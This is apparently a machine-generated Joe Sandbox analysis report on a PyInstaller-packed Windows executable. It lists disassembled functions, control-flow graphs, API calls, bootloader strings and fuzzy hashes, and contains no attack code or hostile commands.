                                                                                                                                                          control_flow_graph 409 7ff714c81600-7ff714c81611 410 7ff714c81637-7ff714c81651 call 7ff714c845c0 409->410 411 7ff714c81613-7ff714c8161c call 7ff714c81050 409->411 416 7ff714c81653-7ff714c81681 call 7ff714c94f08 call 7ff714c82910 410->416 417 7ff714c81682-7ff714c8169c call 7ff714c845c0 410->417 418 7ff714c8162e-7ff714c81636 411->418 419 7ff714c8161e-7ff714c81629 call 7ff714c82710 411->419 426 7ff714c8169e-7ff714c816b3 call 7ff714c82710 417->426 427 7ff714c816b8-7ff714c816cf call 7ff714c906d4 417->427 419->418 435 7ff714c81821-7ff714c81824 call 7ff714c9004c 426->435 433 7ff714c816f9-7ff714c816fd 427->433 434 7ff714c816d1-7ff714c816f4 call 7ff714c94f08 call 7ff714c82910 427->434 437 7ff714c81717-7ff714c81737 call 7ff714c94f44 433->437 438 7ff714c816ff-7ff714c8170b call 7ff714c81210 433->438 448 7ff714c81819-7ff714c8181c call 7ff714c9004c 434->448 443 7ff714c81829-7ff714c8183b 435->443 449 7ff714c81739-7ff714c8175c call 7ff714c94f08 call 7ff714c82910 437->449 450 7ff714c81761-7ff714c8176c 437->450 445 7ff714c81710-7ff714c81712 438->445 445->448 448->435 463 7ff714c8180f-7ff714c81814 449->463 451 7ff714c81802-7ff714c8180a call 7ff714c94f30 450->451 452 7ff714c81772-7ff714c81777 450->452 451->463 456 7ff714c81780-7ff714c817a2 call 7ff714c9039c 452->456 464 7ff714c817da-7ff714c817e6 call 7ff714c94f08 456->464 465 7ff714c817a4-7ff714c817bc call 7ff714c90adc 456->465 463->448 470 7ff714c817ed-7ff714c817f8 call 7ff714c82910 464->470 471 7ff714c817be-7ff714c817c1 465->471 472 7ff714c817c5-7ff714c817d8 call 7ff714c94f08 465->472 477 7ff714c817fd 470->477 471->456 474 7ff714c817c3 471->474 472->470 474->477 477->451
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                          • API String ID: 2050909247-1550345328
                                                                                                                                                          • Opcode ID: d7e5a8d788c56064f5ee056adac7b7af7416d0cf868ad80b96a324f46d3978b4
                                                                                                                                                          • Instruction ID: 1c6502b9623acf7845e2382c3a0eb814c91e1e21e60fe64a3f82159c662c620d
                                                                                                                                                          • Opcode Fuzzy Hash: d7e5a8d788c56064f5ee056adac7b7af7416d0cf868ad80b96a324f46d3978b4
                                                                                                                                                          • Instruction Fuzzy Hash: 8F517361A08E4791EA10BF53D4811A9E391BF86BB4FD44937DE4C47696FE3CE54D8320
                                                                                                                                                          Function 00007FF714C88660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,00000000,00007FF714C83CBB), ref: 00007FF714C88704
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00007FF714C83CBB), ref: 00007FF714C8870A
                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00007FF714C83CBB), ref: 00007FF714C8874C
                                                                                                                                                            • Part of subcall function 00007FF714C88830: GetEnvironmentVariableW.KERNEL32(00007FF714C8388E), ref: 00007FF714C88867
                                                                                                                                                            • Part of subcall function 00007FF714C88830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF714C88889
                                                                                                                                                            • Part of subcall function 00007FF714C98238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF714C98251
                                                                                                                                                            • Part of subcall function 00007FF714C82810: MessageBoxW.USER32 ref: 00007FF714C828EA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                          • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                          • API String ID: 3563477958-1339014028
                                                                                                                                                          • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                          • Instruction ID: ef332e5a052d99bf6ecd2b29fb1da69cba363bd06c1de48685650c4a82f108e4
                                                                                                                                                          • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                          • Instruction Fuzzy Hash: 7E419412A19E4350E914BF63E8D61BA9251AF46BE4FC00133ED0D47A96EE3CE5098270
                                                                                                                                                          Function 00007FF714C81210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 756 7ff714c81210-7ff714c8126d call 7ff714c8bd80 759 7ff714c81297-7ff714c812af call 7ff714c94f44 756->759 760 7ff714c8126f-7ff714c81296 call 7ff714c82710 756->760 765 7ff714c812d4-7ff714c812e4 call 7ff714c94f44 759->765 766 7ff714c812b1-7ff714c812cf call 7ff714c94f08 call 7ff714c82910 759->766 772 7ff714c81309-7ff714c8131b 765->772 773 7ff714c812e6-7ff714c81304 call 7ff714c94f08 call 7ff714c82910 765->773 777 7ff714c81439-7ff714c8144e call 7ff714c8ba60 call 7ff714c94f30 * 2 766->777 776 7ff714c81320-7ff714c81345 call 7ff714c9039c 772->776 773->777 785 7ff714c8134b-7ff714c81355 call 7ff714c90110 776->785 786 7ff714c81431 776->786 793 7ff714c81453-7ff714c8146d 777->793 785->786 792 7ff714c8135b-7ff714c81367 785->792 786->777 794 7ff714c81370-7ff714c81398 call 7ff714c8a1c0 792->794 797 7ff714c8139a-7ff714c8139d 794->797 798 7ff714c81416-7ff714c8142c call 7ff714c82710 794->798 799 7ff714c81411 797->799 800 7ff714c8139f-7ff714c813a9 797->800 798->786 799->798 802 7ff714c813ab-7ff714c813b9 call 7ff714c90adc 800->802 803 7ff714c813d4-7ff714c813d7 800->803 809 7ff714c813be-7ff714c813c1 802->809 805 7ff714c813ea-7ff714c813ef 803->805 806 7ff714c813d9-7ff714c813e7 call 7ff714ca9e30 803->806 805->794 808 7ff714c813f5-7ff714c813f8 805->808 806->805 811 7ff714c8140c-7ff714c8140f 808->811 812 7ff714c813fa-7ff714c813fd 808->812 813 7ff714c813c3-7ff714c813cd call 7ff714c90110 809->813 814 7ff714c813cf-7ff714c813d2 809->814 811->786 812->798 815 7ff714c813ff-7ff714c81407 812->815 813->805 813->814 814->798 815->776
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                          • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                          • Instruction ID: fb77f5e35228911c228639be2cfcea67fc9d1404755acc3583354a3553cd79a5
                                                                                                                                                          • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                          • Instruction Fuzzy Hash: 2651A522A08E4345E660BF13E4813BAE291BF867A4FD44536EE4D477D5EE3CE549C720
                                                                                                                                                          Function 00007FF714C9ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF714C9F0AA,?,?,-00000018,00007FF714C9AD53,?,?,?,00007FF714C9AC4A,?,?,?,00007FF714C95F3E), ref: 00007FF714C9EE8C
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF714C9F0AA,?,?,-00000018,00007FF714C9AD53,?,?,?,00007FF714C9AC4A,?,?,?,00007FF714C95F3E), ref: 00007FF714C9EE98
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                          • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                          • Instruction ID: 7ee319b8170dd027ef0eafbf28a3d5a2ec504ca10f58079079e152f99f7f5025
                                                                                                                                                          • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                          • Instruction Fuzzy Hash: A441CF62B19E0251EB15AF17EC80575A2A1BF5ABB0FD8453ADD1D47784FE3CE4098620
                                                                                                                                                          Function 00007FF714C836B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF714C83804), ref: 00007FF714C836E1
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C83804), ref: 00007FF714C836EB
                                                                                                                                                            • Part of subcall function 00007FF714C82C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF714C83706,?,00007FF714C83804), ref: 00007FF714C82C9E
                                                                                                                                                            • Part of subcall function 00007FF714C82C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF714C83706,?,00007FF714C83804), ref: 00007FF714C82D63
                                                                                                                                                            • Part of subcall function 00007FF714C82C50: MessageBoxW.USER32 ref: 00007FF714C82D99
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                          • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                          • Instruction ID: 51a08fd9d07fb61c4e73bf911b9fc9526f7ca8c9a78c56000db06b2b6138fd7a
                                                                                                                                                          • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                          • Instruction Fuzzy Hash: C0215162B18D4381FA20BF22E8963B6A251BF86764FC00533D65E825E5FE2CE50CC720
                                                                                                                                                          Function 00007FF714C9BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 901 7ff714c9ba5c-7ff714c9ba82 902 7ff714c9ba84-7ff714c9ba98 call 7ff714c94ee8 call 7ff714c94f08 901->902 903 7ff714c9ba9d-7ff714c9baa1 901->903 919 7ff714c9be8e 902->919 905 7ff714c9be77-7ff714c9be83 call 7ff714c94ee8 call 7ff714c94f08 903->905 906 7ff714c9baa7-7ff714c9baae 903->906 922 7ff714c9be89 call 7ff714c9a8e0 905->922 906->905 908 7ff714c9bab4-7ff714c9bae2 906->908 908->905 911 7ff714c9bae8-7ff714c9baef 908->911 914 7ff714c9baf1-7ff714c9bb03 call 7ff714c94ee8 call 7ff714c94f08 911->914 915 7ff714c9bb08-7ff714c9bb0b 911->915 914->922 917 7ff714c9bb11-7ff714c9bb17 915->917 918 7ff714c9be73-7ff714c9be75 915->918 917->918 924 7ff714c9bb1d-7ff714c9bb20 917->924 923 7ff714c9be91-7ff714c9bea8 918->923 919->923 922->919 924->914 928 7ff714c9bb22-7ff714c9bb47 924->928 930 7ff714c9bb7a-7ff714c9bb81 928->930 931 7ff714c9bb49-7ff714c9bb4b 928->931 932 7ff714c9bb83-7ff714c9bbab call 7ff714c9d5fc call 7ff714c9a948 * 2 930->932 933 7ff714c9bb56-7ff714c9bb6d call 7ff714c94ee8 call 7ff714c94f08 call 7ff714c9a8e0 930->933 934 7ff714c9bb72-7ff714c9bb78 931->934 935 7ff714c9bb4d-7ff714c9bb54 931->935 962 7ff714c9bbc8-7ff714c9bbf3 call 7ff714c9c284 932->962 963 7ff714c9bbad-7ff714c9bbc3 call 7ff714c94f08 call 7ff714c94ee8 932->963 967 7ff714c9bd00 933->967 936 7ff714c9bbf8-7ff714c9bc0f 934->936 935->933 935->934 939 7ff714c9bc11-7ff714c9bc19 936->939 940 7ff714c9bc8a-7ff714c9bc94 call 7ff714ca391c 936->940 939->940 943 7ff714c9bc1b-7ff714c9bc1d 939->943 953 7ff714c9bc9a-7ff714c9bcaf 940->953 954 7ff714c9bd1e 940->954 943->940 947 7ff714c9bc1f-7ff714c9bc35 943->947 947->940 951 7ff714c9bc37-7ff714c9bc43 947->951 951->940 956 7ff714c9bc45-7ff714c9bc47 951->956 953->954 959 7ff714c9bcb1-7ff714c9bcc3 GetConsoleMode 953->959 958 7ff714c9bd23-7ff714c9bd43 ReadFile 954->958 956->940 961 7ff714c9bc49-7ff714c9bc61 956->961 964 7ff714c9bd49-7ff714c9bd51 958->964 965 7ff714c9be3d-7ff714c9be46 GetLastError 958->965 959->954 966 7ff714c9bcc5-7ff714c9bccd 959->966 961->940 972 7ff714c9bc63-7ff714c9bc6f 961->972 962->936 963->967 964->965 974 7ff714c9bd57 964->974 969 7ff714c9be63-7ff714c9be66 965->969 970 7ff714c9be48-7ff714c9be5e call 7ff714c94f08 call 7ff714c94ee8 965->970 966->958 968 7ff714c9bccf-7ff714c9bcf1 ReadConsoleW 966->968 971 7ff714c9bd03-7ff714c9bd0d call 7ff714c9a948 967->971 976 7ff714c9bd12-7ff714c9bd1c 968->976 977 7ff714c9bcf3 GetLastError 968->977 981 7ff714c9bcf9-7ff714c9bcfb call 7ff714c94e7c 969->981 982 7ff714c9be6c-7ff714c9be6e 969->982 970->967 971->923 972->940 980 7ff714c9bc71-7ff714c9bc73 972->980 984 7ff714c9bd5e-7ff714c9bd73 974->984 976->984 977->981 980->940 989 7ff714c9bc75-7ff714c9bc85 980->989 981->967 982->971 984->971 991 7ff714c9bd75-7ff714c9bd80 984->991 989->940 994 7ff714c9bd82-7ff714c9bd9b call 7ff714c9b674 991->994 995 7ff714c9bda7-7ff714c9bdaf 991->995 1001 7ff714c9bda0-7ff714c9bda2 994->1001 997 7ff714c9bdb1-7ff714c9bdc3 995->997 998 7ff714c9be2b-7ff714c9be38 call 7ff714c9b4b4 995->998 1002 7ff714c9bdc5 997->1002 1003 7ff714c9be1e-7ff714c9be26 997->1003 998->1001 1001->971 1005 7ff714c9bdca-7ff714c9bdd1 1002->1005 1003->971 1006 7ff714c9bdd3-7ff714c9bdd7 1005->1006 1007 7ff714c9be0d-7ff714c9be18 1005->1007 1008 7ff714c9bdf3 1006->1008 1009 7ff714c9bdd9-7ff714c9bde0 1006->1009 1007->1003 1011 7ff714c9bdf9-7ff714c9be09 1008->1011 1009->1008 1010 7ff714c9bde2-7ff714c9bde6 1009->1010 1010->1008 1012 7ff714c9bde8-7ff714c9bdf1 1010->1012 1011->1005 1013 7ff714c9be0b 1011->1013 1012->1011 1013->1003
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                          • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                          • Instruction ID: 6bc43d59b8b5def7f889fc9c8f861297b66965ea3d830f92c17f7461f31c1629
                                                                                                                                                          • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                          • Instruction Fuzzy Hash: 3DC1A52291CE87B1E660AF16D8802BDB754FB82BA0FD54132EA4D07795FE7CE44D8720
                                                                                                                                                          Function 00007FF714C88570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                                          • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                          • Instruction ID: 46e1782de8bd4d3dada935d3ca933220ce07e25edfdd976fd192429bd6a9f9fc
                                                                                                                                                          • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                          • Instruction Fuzzy Hash: DF212622A0CA4341E650AF56F58512AE7A0EB867B0F900636E76D43AD4EE7CD4498720
                                                                                                                                                          Function 00007FF714C890E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00007FF714C88570: GetCurrentProcess.KERNEL32 ref: 00007FF714C88590
                                                                                                                                                            • Part of subcall function 00007FF714C88570: OpenProcessToken.ADVAPI32 ref: 00007FF714C885A3
                                                                                                                                                            • Part of subcall function 00007FF714C88570: GetTokenInformation.KERNELBASE ref: 00007FF714C885C8
                                                                                                                                                            • Part of subcall function 00007FF714C88570: GetLastError.KERNEL32 ref: 00007FF714C885D2
                                                                                                                                                            • Part of subcall function 00007FF714C88570: GetTokenInformation.KERNELBASE ref: 00007FF714C88612
                                                                                                                                                            • Part of subcall function 00007FF714C88570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF714C8862E
                                                                                                                                                            • Part of subcall function 00007FF714C88570: CloseHandle.KERNEL32 ref: 00007FF714C88646
                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF714C83C55), ref: 00007FF714C8916C
                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF714C83C55), ref: 00007FF714C89175
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                          • API String ID: 6828938-1529539262
                                                                                                                                                          • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                          • Instruction ID: ae3794c728ad2c8ded654fbd586e52560eb0764b90d10aa9ae8308b71b645e7f
                                                                                                                                                          • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                          • Instruction Fuzzy Hash: 82216135A08E4282F610BF12E4962FAA261FF86790FD44433EA4D53B95EF3CD8098760
                                                                                                                                                          Function 00007FF714C87E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryW.KERNELBASE(00000000,?,00007FF714C8352C,?,00000000,00007FF714C83F1B), ref: 00007FF714C87F32
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                          • Opcode ID: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                                                                          • Instruction ID: 6f7a03c009e85ba98741b53b1255a2ec328ff491e6a61607471569cd566da8d2
                                                                                                                                                          • Opcode Fuzzy Hash: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                                                                          • Instruction Fuzzy Hash: 0031DA71619EC245EA21AF12E8917AAA354EF85BF4F800232EA6D477C5EE3CD6098710
                                                                                                                                                          Function 00007FF714C9CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
